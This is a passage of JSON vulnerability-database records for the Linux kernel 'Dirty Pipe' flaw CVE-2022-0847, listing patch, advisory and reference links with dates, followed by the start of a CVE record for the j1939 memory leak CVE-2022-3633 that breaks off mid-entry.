        "id": "166265"
      },
      {
        "db": "PACKETSTORM",
        "id": "166264"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202203-522"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-0847"
      }
    ]
  },
  "id": "VAR-202203-0043",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.21111111
  },
  "last_update_date": "2024-07-23T21:45:03.589000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Bug\u00a02060795",
        "trust": 0.8,
        "url": "https://fedoraproject.org/"
      },
      {
        "title": "Linux kernel Security vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=184957"
      },
      {
        "title": "Red Hat: Important: kernel-rt security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20220822 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20220831 - security advisory"
      },
      {
        "title": "Red Hat: ",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2022-0847"
      },
      {
        "title": "Arch Linux Issues: ",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=cve-2022-0847"
      },
      {
        "title": "Dirty-Pipe-Oneshot",
        "trust": 0.1,
        "url": "https://github.com/badboy-sft/dirty-pipe-oneshot "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2022-0847"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-007117"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202203-522"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-665",
        "trust": 1.0
      },
      {
        "problemtype": "Improper initialization (CWE-665) [NVD evaluation ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-007117"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-0847"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 3.0,
        "url": "http://packetstormsecurity.com/files/166229/dirty-pipe-linux-privilege-escalation.html"
      },
      {
        "trust": 3.0,
        "url": "http://packetstormsecurity.com/files/166258/dirty-pipe-local-privilege-escalation.html"
      },
      {
        "trust": 2.4,
        "url": "http://packetstormsecurity.com/files/166230/dirty-pipe-suid-binary-hijack-privilege-escalation.html"
      },
      {
        "trust": 1.6,
        "url": "https://dirtypipe.cm4all.com/"
      },
      {
        "trust": 1.6,
        "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-222547.pdf"
      },
      {
        "trust": 1.6,
        "url": "https://psirt.global.sonicwall.com/vuln-detail/snwlid-2022-0015"
      },
      {
        "trust": 1.6,
        "url": "https://www.suse.com/support/kb/doc/?id=000020603"
      },
      {
        "trust": 1.6,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2060795"
      },
      {
        "trust": 1.6,
        "url": "https://security.netapp.com/advisory/ntap-20220325-0005/"
      },
      {
        "trust": 1.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0847"
      },
      {
        "trust": 1.3,
        "url": "https://access.redhat.com/security/cve/cve-2022-0847"
      },
      {
        "trust": 1.0,
        "url": "http://packetstormsecurity.com/files/176534/linux-4.20-ktls-read-only-write.html"
      },
      {
        "trust": 0.8,
        "url": "https://jvn.jp/vu/jvnvu99030761/index.html"
      },
      {
        "trust": 0.8,
        "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-22-167-09"
      },
      {
        "trust": 0.7,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.7,
        "url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.6,
        "url": "https://cxsecurity.com/issue/wlb-2022030060"
      },
      {
        "trust": 0.6,
        "url": "https://www.exploit-db.com/exploits/50808"
      },
      {
        "trust": 0.6,
        "url": "https://cxsecurity.com/issue/wlb-2022030042"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/166305/red-hat-security-advisory-2022-0841-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2022031308"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/166516/red-hat-security-advisory-2022-1083-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2022032843"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/166241/ubuntu-security-notice-usn-5317-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.1405"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2022031036"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/166280/red-hat-security-advisory-2022-0822-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.1027"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2022030808"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.1064"
      },
      {
        "trust": 0.6,
        "url": "https://us-cert.cisa.gov/ics/advisories/icsa-22-167-09"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2022042576"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/166569/ubuntu-security-notice-usn-5362-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://cxsecurity.com/cveshow/cve-2022-0847/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/166812/red-hat-security-advisory-2022-1476-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://vigilance.fr/vulnerability/linux-kernel-file-write-via-dirty-pipe-37724"
      },
      {
        "trust": 0.6,
        "url": "https://source.android.com/security/bulletin/2022-05-01"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.0944"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.2981"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.0965"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2022031421"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.1677"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/cve/cve-2022-0492"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/cve/cve-2022-22942"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/cve/cve-2022-0330"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/vulnerabilities/rhsb-2022-002"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-0920"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-0920"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0492"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0330"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-4154"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2022-0435"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-22942"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-25315"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-25236"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/updates/classification/#moderate"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-25235"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-23308"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-23852"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-22822"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-22823"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-22827"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-0392"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-0261"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-31566"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-22826"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-23177"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3999"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-0413"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-23219"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-22824"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-45960"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-23218"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-22825"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-23177"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-46143"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-0516"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-31566"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-0361"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-0359"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-0318"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0435"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-4154"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-4083"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-4083"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22925"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-19603"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25710"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-20838"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-21684"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12762"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-36085"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-16135"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-36084"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25710"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20231"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20232"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28153"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-41190"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3445"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-36086"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-4122"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17594"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-36087"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22898"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-42574"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-5827"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19603"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-18218"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-14155"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-13435"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-33560"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-16135"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-14155"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25709"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-17595"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-13751"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3426"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-22817"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3572"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-20232"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-20838"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-22925"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-44716"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:1396"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-17594"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-22876"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-13750"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-12762"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3577"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-13435"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/latest/migration_toolkit_for_containers/installing-mtc.html"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-36221"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-28153"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-18218"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-0532"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22876"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2014-3577"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-22898"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-22816"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3580"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3800"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-21684"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-13751"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17595"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-24407"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3200"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-24370"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-20231"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-24370"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-0778"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-5827"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-13750"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3521"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25709"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-44717"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-0235"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-0155"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0235"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-22825"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0516"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0536"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html-single/install/index#installing"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html/release_notes/index"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-0536"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:1083"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0144"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0261"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0361"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-22823"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-23566"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0318"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-22824"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-45960"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-22822"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-46143"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3999"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html/release_notes/"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-0144"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0413"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-23566"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0359"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0392"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0155"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:0822"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:0821"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-4028"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:0823"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-4028"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:0831"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:0819"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-007117"
      },
      {
        "db": "PACKETSTORM",
        "id": "166789"
      },
      {
        "db": "PACKETSTORM",
        "id": "166516"
      },
      {
        "db": "PACKETSTORM",
        "id": "166280"
      },
      {
        "db": "PACKETSTORM",
        "id": "166282"
      },
      {
        "db": "PACKETSTORM",
        "id": "166281"
      },
      {
        "db": "PACKETSTORM",
        "id": "166265"
      },
      {
        "db": "PACKETSTORM",
        "id": "166264"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202203-522"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-0847"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULMON",
        "id": "CVE-2022-0847"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-007117"
      },
      {
        "db": "PACKETSTORM",
        "id": "166789"
      },
      {
        "db": "PACKETSTORM",
        "id": "166516"
      },
      {
        "db": "PACKETSTORM",
        "id": "166280"
      },
      {
        "db": "PACKETSTORM",
        "id": "166282"
      },
      {
        "db": "PACKETSTORM",
        "id": "166281"
      },
      {
        "db": "PACKETSTORM",
        "id": "166265"
      },
      {
        "db": "PACKETSTORM",
        "id": "166264"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202203-522"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-0847"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2022-03-10T00:00:00",
        "db": "VULMON",
        "id": "CVE-2022-0847"
      },
      {
        "date": "2023-07-12T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2022-007117"
      },
      {
        "date": "2022-04-20T15:12:33",
        "db": "PACKETSTORM",
        "id": "166789"
      },
      {
        "date": "2022-03-29T15:53:19",
        "db": "PACKETSTORM",
        "id": "166516"
      },
      {
        "date": "2022-03-11T16:38:56",
        "db": "PACKETSTORM",
        "id": "166280"
      },
      {
        "date": "2022-03-11T16:39:27",
        "db": "PACKETSTORM",
        "id": "166282"
      },
      {
        "date": "2022-03-11T16:39:13",
        "db": "PACKETSTORM",
        "id": "166281"
      },
      {
        "date": "2022-03-11T16:31:15",
        "db": "PACKETSTORM",
        "id": "166265"
      },
      {
        "date": "2022-03-11T16:31:02",
        "db": "PACKETSTORM",
        "id": "166264"
      },
      {
        "date": "2022-03-07T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202203-522"
      },
      {
        "date": "2022-03-10T17:44:57.283000",
        "db": "NVD",
        "id": "CVE-2022-0847"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2024-01-12T00:00:00",
        "db": "VULMON",
        "id": "CVE-2022-0847"
      },
      {
        "date": "2023-07-12T06:29:00",
        "db": "JVNDB",
        "id": "JVNDB-2022-007117"
      },
      {
        "date": "2022-08-11T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202203-522"
      },
      {
        "date": "2024-07-02T17:05:01.307000",
        "db": "NVD",
        "id": "CVE-2022-0847"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202203-522"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux\u00a0Kernel\u00a0 Initialization vulnerability in",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-007117"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "other",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202203-522"
      }
    ],
    "trust": 0.6
  }
}

cve-2022-3633
Vulnerability from cvelistv5
Published
2022-10-21 00:00
Modified
2024-08-03 01:14
Summary
Linux Kernel transport.c j1939_session_destroy memory leak
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T01:14:03.231Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "vdb-entry",
              "technical-description",
              "x_transferred"
            ],
            "url": "https://vuldb.com/?id.211932"
          },
          {
            "tags": [
              "signature",
              "permissions-required",
              "x_transferred"
            ],
            "url": "https://vuldb.com/?ctiid.211932"
          },
          {
            "tags": [
              "patch",
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/klassert/ipsec-next.git/commit/?id=8c21c54a53ab21842f5050fa090f26b03c0313d6"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Kernel",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A vulnerability classified as problematic has been found in Linux Kernel. Affected is the function j1939_session_destroy of the file net/can/j1939/transport.c. The manipulation leads to memory leak. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211932."
        },
        {
          "lang": "de",
          "value": "Es wurde eine problematische Schwachstelle in Linux Kernel entdeckt. Es geht dabei um die Funktion j1939_session_destroy der Datei net/can/j1939/transport.c. Mittels Manipulieren mit unbekannten Daten kann eine memory leak-Schwachstelle ausgenutzt werden. Als bestm\u00f6gliche Massnahme wird Patching empfohlen."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "baseScore": 3.5,
            "baseSeverity": "LOW",
            "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
            "version": "3.1"
          }
        },
        {
          "cvssV3_0": {
            "baseScore": 3.5,
            "baseSeverity": "LOW",
            "vectorString": "CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
            "version": "3.0"
          }
        },
        {
          "cvssV2_0": {
            "baseScore": 2.7,
            "vectorString": "AV:A/AC:L/Au:S/C:N/I:N/A:P",
            "version": "2.0"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-401",
              "description": "CWE-401 Memory Leak",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-10-20T14:03:55.871Z",
        "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
        "shortName": "VulDB"
      },
      "references": [
        {
          "tags": [
            "vdb-entry",
            "technical-description"
          ],
          "url": "https://vuldb.com/?id.211932"
        },
        {
          "tags": [
            "signature",
            "permissions-required"
          ],
          "url": "https://vuldb.com/?ctiid.211932"
        },
        {
          "tags": [
